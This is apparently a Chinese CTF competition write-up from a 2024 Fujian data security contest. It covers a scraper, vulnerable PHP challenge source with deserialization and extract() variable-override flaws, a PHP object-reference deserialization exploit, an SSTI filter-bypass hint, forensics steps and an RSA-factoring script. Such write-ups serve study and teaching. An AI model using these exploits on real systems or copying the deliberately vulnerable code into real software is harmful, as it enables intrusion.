2024年福建省数据安全-技能实践大赛WP

速算比赛

一个3秒速算30题，用python的requests库和BeautifulSoup库，写个爬虫就行（早应该备一点脚本的，现场写，血都被抢了）。

import requests
from bs4 import BeautifulSoup
url = 'http://10.1.103.10/'

s=requests.Session()
r=s.post(url=url)
for i in range(31):
    soup = BeautifulSoup(r.text, 'html.parser')
    Calculate = soup.find('h1').next_sibling.strip()
    Calculate=Calculate.replace("Calculate: ","")
    ans=eval(Calculate)
    data={'answer':ans}
    r=s.post(url=url,data=data)
    print(r.text)

popmart

当时给了提示，相当于给了源代码，我发现一个auth.php授权然后跳转到tcClassLoad.php，以为是预期解要先解到auth.php然后下一步是tcClassLoad.php。然后盯着那个tcClassLoad.php写了半天的链子，卡在那个$_GET的变量覆盖卡半天，最后还是没解出来看其他了去了。赛后问了其他师傅，当时没注意到还有个p0pmart.php，而且题目也是p0pmart，前面可能是兔子洞，也可能是我太菜了。

tcClassLoad.php:

<?php
error_reporting(0);
include "auth.php";


class Als
{
    public $text;
    public $dict;
    public function __wakeup()
    {
        if ($this->text == "helloworld") {
            $this->dict->init();
        }
    }
    public function __toString()
    {

        $this->text->undefinedProperty = 'New Value';

        return "HACKER";
    }
}

class Kl
{
    public $apple;
    public $phone;
    public $var;

    public function __call($name, $arguments)
    {
        echo $this->apple;
    }

    public function __get($name)
    {
        foreach ($_GET as $key => $value) {
            $$key = $$value;
        }
        if ($_GET == "Hack") {

            if (isset($this->var)) {
                $arr[$this->var] = 1;
                if ($arr[] = 1) {
                    die("Hack!!");
                } else {
                    $this->content = file_get_contents($this->phone);

                    echo $this->content;
                }
            }
        }
    }
}

class Glb
{
    public $boy;
    public $gay;
    private $cc;

    public function init($a, $b)
    {
        $this->boy = $a;
        $this->gay = $b;

    }

    public function __set($name, $value)
    {

        if (isset($this->boy)) {
            print_r("1314");


            return $this->boy->name;
        }

    }

}
if (isset($_POST['cmd'])) {
    $serializecmd = $_POST['cmd'];
    $unserializecmd = unserialize($serializecmd);
    $unserializecmd->init();
} else {
    highlight_file(__FILE__);
}


?>

p0pmart.php：

<?php
require_once("flag.php");
highlight_file(__FILE__);
class popmart{
    public $yuki;
    public $molly;
    public $dimoo;

    public function __construct(){
        $this->yuki='tell me where';
        $this->molly='dont_tell_you';
        $this->dimoo="you_can_guess";
    }

    public function __wakeup(){
        global $flag;
        global $where_you_go;
        $this->yuki=$where_you_go;
        if($this->molly === $this->yuki){
            echo $flag;
        }
    }
}

$pucky = $_GET['wq'];
if(isset($pucky)){
    if($pucky==="二仙桥"){
        extract($_POST);
        if($pucky==="二仙桥"){    
            die("<script>window.alert('说说看，你要去哪？？');</script>");
        }
        unserialize($pucky);
    }
}

这个p0pmart.php解法就很简单了，反序列化使用引用就行。

exp:

<?php
class popmart
{
    public $yuki;
    public $molly;
    public $dimoo;

}

$a=new popmart();
$a->molly=&$a->yuki;
echo serialize($a);

传参数，简单变量就好。

Sal的图集

SSTI注入，payload打的时候好像是过滤了[',用__getitem__来替换。

evidence

内存取证

根据提示查看剪切板，跑出密码Dki98misc@irR32df

猜测是压缩包密码，直接找flag文件。

解密就出了，这题拿了三血。

findme

window磁盘取证

用Strings直接出密码Th1$isP@ssW0rd!

用AutoSpy打开，找到flag.zip解除，跑出true flag

不良劫

formost一下有个二维码

修复一下，就能得到前半段flag。

盲水印提取一下

gza_Cracker

哥斯拉流量密钥爆破，但是我一眼就看出密码是Antsw0rd，要说为什么呢，就只能说是它给的连接密码是Antsowrd。

ddd

给的e非常大，一眼就是维纳攻击，工具直接梭了。

OpenRSA

随便试了一下pp的值，爆破也行

from Crypto.Util.number import *
import gmpy2

n = 91332943043957251900549627486310189996740089685835683300621629110943492183477268072298084280915990633551010090925404931181501528744693585078837081210712114190987563470157519717774234682286443126927653309723270524901176734059185014688925211350678028031584074094348200320194354359517392064299266428589467651877
e = 65537
c = 56047741088808471978777825274508389592730927600153384445849570005499054151546904431595413241700524283982925340735997036959411123465509486474875805374561817710368400036617625285408296984445244211890678298780346979950633523883426046251122190772687200378680540970303449180211765041573634411303625986012155354363
s = 85800895230491036216758530886003341168631461607188722404807814593592648170497231916924533123351386068154228324172747834362249217755009796485811038447281072462412691656306643440837354994979197958887259958930060878212841756145266179832110649310586242527945793993646330413532949285121357704413955480099382778653

pp = 1
p = gmpy2.iroot(s-pp**2, 2)[0]
q=n//p
d = inverse(e, (p-1)*(q-1))
m = pow(c, d, n)
print(long_to_bytes(m))